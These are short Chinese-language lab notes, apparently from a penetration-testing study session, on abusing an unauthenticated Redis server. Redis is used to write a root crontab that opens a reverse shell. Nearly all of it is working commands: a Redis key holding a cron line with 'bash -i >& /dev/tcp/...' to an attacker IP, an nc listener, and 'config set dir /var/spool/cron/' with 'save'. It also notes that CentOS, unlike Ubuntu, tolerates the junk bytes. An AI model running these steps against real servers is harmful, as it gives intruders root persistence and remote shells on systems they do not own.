redis数据库写入文件
计划任务反弹shell(ubuntu不能,centos)
写入一句话木马
==在kali里面测试==
打开redis数据库
keys *
set haha "\n\n * * * * bash -i >& /dev/tcp/192.168.3.134/9999 0>&1\n\n"
get haha
另起一个窗口,先测试命令是否有问题
==kali==
nc -nlvp 9999
==ubuntu==
bash -i >& /dev/tcp/192.168.3.134/9999 0>&1
可以连接上,命令无问题
==kali==
打开redis数据库
config set dir /var/spool/cron/
config set dbfilename root
save
==ubuntu==
cd/var/spool/cron/
cat root
可以查看到root里是写入的重定向
计划任务地点
/etc/crontab
/etc/cron.d/
/var/spool/cron/crontabs/
ubuntu中计划任务出现乱码会不执行,但是centos会忽略乱码,所以可以执行
